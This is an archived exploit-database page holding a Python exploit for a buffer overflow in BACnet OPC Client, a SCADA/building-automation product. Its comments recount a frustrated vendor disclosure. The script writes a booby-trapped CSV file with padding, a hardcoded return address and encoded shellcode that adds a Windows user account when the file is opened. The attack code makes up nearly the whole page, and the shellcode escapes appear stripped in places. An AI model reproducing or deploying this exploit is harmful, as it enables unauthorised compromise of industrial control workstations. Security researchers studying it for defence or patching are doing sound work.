Home / os / win7

[local exploits] - BACnet OPC Client Buffer Overflow Exploit

Posted on 16 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>BACnet OPC Client Buffer Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: Jeremy Brown' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================
BACnet OPC Client Buffer Overflow Exploit
=========================================

#!/usr/bin/python
# bacnet.py
# BACnet OPC Client Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Sept 2010
#
# After communicating via several emails with the vendor, sharing details
# about the vulnerability, as well as proof-of-concept code (I also offered
# to send the exploit code for them to test themselves), it was clear that
# they weren&#039;t very interested in fixing the vulnerability. They even ended our
# conversation with &quot;Hi Jeremy, thanks but please don&#039;t waste my time.&quot;, and
# quickly became unresponsive to further communication. A couple days later, I
# notified them know of my plans to release exploit code to the public, proving
# the vulnerability, since they weren&#039;t planning on releasing a fix. They didn&#039;t
# respond with anything indicating plans for an update, so maybe this will help.
#
# If you are a customer (they seem to care much more about your concerns), I would
# suggest contacting support at scadaengine.com and ask them to issue a fix.
#
# Successfully tested on Windows XP Service Pack 3 with BACnet OPC CLient 1.0.24
#
 
import sys
import struct
 
ret=0x7C96BF33 # jmp esp @ user32.dll
 
junk=&quot;B&quot;*185
 
# win32_adduser -  PASS=ware EXITFUNC=thread USER=sploit Size=497 Encoder=PexAlphaNum
payload=(
&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot;
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot;
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot;
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot;
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54&quot;
&quot;x42x30x42x50x42x50x4bx48x45x44x4ex53x4bx58x4ex37&quot;
&quot;x45x30x4ax37x41x50x4fx4ex4bx58x4fx34x4ax51x4bx58&quot;
&quot;x4fx45x42x52x41x30x4bx4ex49x44x4bx58x46x33x4bx38&quot;
&quot;x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x38x42x4c&quot;
&quot;x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e&quot;
&quot;x46x4fx4bx33x46x55x46x32x46x50x45x57x45x4ex4bx58&quot;
&quot;x4fx55x46x42x41x30x4bx4ex48x36x4bx58x4ex30x4bx54&quot;
&quot;x4bx58x4fx45x4ex51x41x30x4bx4ex4bx58x4ex41x4bx48&quot;
&quot;x41x50x4bx4ex49x48x4ex55x46x42x46x30x43x4cx41x43&quot;
&quot;x42x4cx46x46x4bx58x42x44x42x53x45x38x42x4cx4ax57&quot;
&quot;x4ex30x4bx58x42x54x4ex30x4bx58x42x47x4ex31x4dx4a&quot;
&quot;x4bx58x4ax56x4ax50x4bx4ex49x30x4bx38x42x48x42x4b&quot;
&quot;x42x30x42x30x42x30x4bx58x4ax36x4ex43x4fx55x41x43&quot;
&quot;x48x4fx42x36x48x45x49x38x4ax4fx43x58x42x4cx4bx57&quot;
&quot;x42x35x4ax36x4fx4ex50x4cx42x4ex42x36x4ax46x4ax49&quot;
&quot;x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x4dx36&quot;
&quot;x46x56x50x32x45x36x4ax57x45x46x42x32x4fx42x43x56&quot;
&quot;x42x42x50x36x45x36x46x57x42x52x45x57x43x47x45x36&quot;
&quot;x44x37x42x32x43x47x42x57x4ex36x4fx46x49x36x46x57&quot;
&quot;x42x32x47x37x41x46x44x57x45x46x42x42x4fx42x41x34&quot;
&quot;x46x34x46x44x42x32x48x42x48x42x42x52x50x36x45x56&quot;
&quot;x46x47x42x42x4ex46x4fx56x43x46x41x36x4ex56x47x56&quot;
&quot;x44x47x4fx36x45x47x42x37x42x42x41x54x46x56x4dx36&quot;
&quot;x49x46x50x56x49x36x43x47x46x47x44x57x41x56x46x57&quot;
&quot;x4fx46x44x47x43x37x42x42x43x47x42x47x4ex46x4fx36&quot;
&quot;x49x46x46x47x42x32x4fx32x41x34x46x34x46x34x42x50&quot;
&quot;x5a&quot;
)
 
csv1=&quot;OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME
\&quot;;
csv2=&quot;\scada,0,0,
&quot;;
 
if len(sys.argv)&lt;2:
    print &quot;Usage: &quot;+sys.argv[0]+&quot; &lt;filename.csv&gt;&quot;
    sys.exit(0)
 
 
file=sys.argv[1]
 
retaddr=struct.pack(&quot;&lt;L&quot;,ret)
 
csv=csv1+junk+retaddr+&quot;X&quot;*4+payload+csv2
 
try:
     f=open(file,&quot;w&quot;)
     f.write(csv)
     f.close()
 
except IOError,e:
     print e
 
else:
     print &quot;Open %s in the OPC client to exploit the vulnerability.&quot; % file


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-16]</pre></body></html>

 

TOP